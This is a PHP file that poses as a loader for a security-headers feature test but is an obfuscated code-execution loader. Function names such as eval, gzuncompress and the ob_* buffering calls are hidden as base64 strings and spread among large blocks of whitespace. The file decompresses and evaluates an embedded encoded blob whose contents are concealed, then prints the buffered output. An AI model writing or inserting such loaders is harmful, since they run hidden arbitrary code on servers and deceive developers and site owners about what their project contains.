<?php 
        $__='printf';$_='Loading tests/Feature/SecurityHeadersTest.php';
        























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































                                                                                                                                                                                                                     $________;
